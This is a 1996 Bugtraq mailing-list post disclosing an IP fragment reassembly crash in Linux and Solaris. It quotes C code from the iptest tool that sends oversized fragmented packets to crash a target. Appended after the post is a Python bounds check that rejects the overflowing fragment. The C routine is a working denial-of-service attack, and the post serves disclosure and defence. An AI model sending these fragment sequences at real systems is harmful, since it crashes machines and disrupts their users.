[3549] in bugtraq
Re: Urgent !! Serious Linux Security Bug....
daemon@ATHENA.MIT.EDU (Darren Reed)
Tue Oct 22 15:18:26 1996
Date: Tue, 22 Oct 1996 23:44:06 +1000
Reply-To: Darren Reed <avalon@coombs.anu.edu.au>
From: Darren Reed <avalon@coombs.anu.edu.au>
X-To: usa@win95.com
To: Multiple recipients of list BUGTRAQ <BUGTRAQ@NETSPACE.ORG>
In-Reply-To: <3269053B.3D6F@win95.com> from "Jake the Prince" at Oct 19, 96 06:43:39 pm
Solaris2 was, I believe, vulnerable to this bug too.
From the "Crashable" file for iptest:
Solaris 2.4 - up to and including 101945-34, > 34 ?
Solaris 2.5 - 11/95
(Yes, I stumbled upon this about the same time last year, but don't exactly
have the time or resources to check everything under the sun, especially
new operating systems...)
For those with it handy, "iptest -1 -p 8", but I built in some random lossage
which may stop it triggering the bug.
I think if the lossage is taken out, some systems will try to reassemble
it all into a buffer which (of course), is at max. 64k in size.
However, it doesn't try to send an ICMP packet; the following segment of
code is what triggers it:
    if (!ptest || (ptest == 8)) {
        struct timeval tv;

        gettimeofday(&tv, NULL);
        srand(tv.tv_sec ^ getpid() ^ tv.tv_usec);
        /*
         * Part8: 63k packet + 1k fragment at offset 0x1ffe
         */
        ip->ip_off = IP_MF;
        u->uh_dport = htons(9);
        ip->ip_id = htons(id++);
        printf("1.8. 63k packet + 1k fragment at offset 0x1ffe\n");
        ip->ip_len = 768 + 20 + 8;
        /* the (rand() & 0x1f) tests are the built-in random lossage */
        if ((rand() & 0x1f) != 0) {
            (void) send_ip(nfd, mtu, ip, gwip, 1);
            printf("%d\r", i);
        } else
            printf("skip 0\n");
        ip->ip_len = MIN(768 + 20, mtu - 68);
        i = 512;
        for (; i < (63 * 1024 + 768); i += 768) {
            ip->ip_off = IP_MF | (i >> 3);
            if ((rand() & 0x1f) != 0) {
                (void) send_ip(nfd, mtu, ip, gwip, 1);
                printf("%d\r", i);
            } else
                printf("skip %d\n", i);
            fflush(stdout);
            PAUSE();
        }
        ip->ip_len = 896 + 20;
        ip->ip_off = IP_MF | (i >> 3);
        if ((rand() & 0x1f) != 0) {
            (void) send_ip(nfd, mtu, ip, gwip, 1);
            printf("%d\r", i);
        } else
            printf("skip\n");
        putchar('\n');
        fflush(stdout);
    }
Doesn't work against any system using a BSD based IP networking code.
Darren
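As an added example, not part of Darren Reed's post or of iptest, this is the bounds check a fragment reassembler needs so that a fragment placed at offset field 0x1ffe cannot push the reassembled datagram past the 65535-byte IP maximum. The fragment sequence is constructed here to mirror the offsets in the excerpt above, and the constant names follow the BSD ip header conventions the excerpt uses.

```python
IP_MF = 0x2000        # "more fragments" flag, as in BSD <netinet/ip.h>
IP_OFFMASK = 0x1FFF   # 13-bit fragment offset, counted in 8-byte units
IP_HDR_LEN = 20       # assumed header length (no IP options) for every fragment
IP_MAXPACKET = 65535  # largest legal IP datagram, header included


def fragment_span(ip_off, ip_len):
    """Byte range [start, end) that a fragment's payload occupies in the
    reassembled datagram, taken from the raw ip_off and ip_len fields."""
    start = (ip_off & IP_OFFMASK) * 8
    end = start + (ip_len - IP_HDR_LEN)
    return start, end


def reassembly_fits(fragments):
    """Check a list of (ip_off, ip_len) pairs that share one ip_id.
    Returns (ok, largest_end, offending_index): ok is False at the first
    fragment whose payload end plus a header would exceed IP_MAXPACKET,
    which is the case a reassembler must reject instead of copying into
    its fixed 64k buffer."""
    largest_end = 0
    for idx, (ip_off, ip_len) in enumerate(fragments):
        _, end = fragment_span(ip_off, ip_len)
        if end + IP_HDR_LEN > IP_MAXPACKET:
            return False, end, idx
        largest_end = max(largest_end, end)
    return True, largest_end, None


def part8_like_fragments():
    """Constructed sequence modelled on the post's part 8 (not iptest's own
    output): a first fragment, 768-byte pieces from offset 512 up to 63k,
    and a final 896-byte piece at offset field 0x1ffe (byte 65520)."""
    frags = [(IP_MF, 768 + 20 + 8)]
    i = 512
    while i < 63 * 1024:
        frags.append((IP_MF | (i >> 3), 768 + 20))
        i += 768
    frags.append((IP_MF | 0x1FFE, 896 + 20))
    return frags


if __name__ == "__main__":
    ok, end, idx = reassembly_fits(part8_like_fragments())
    print("fits" if ok else f"reject fragment {idx}: payload ends at byte {end}")
```

Every fragment up to the 63k mark passes; the final piece ends at byte 66416 and is the one the check refuses.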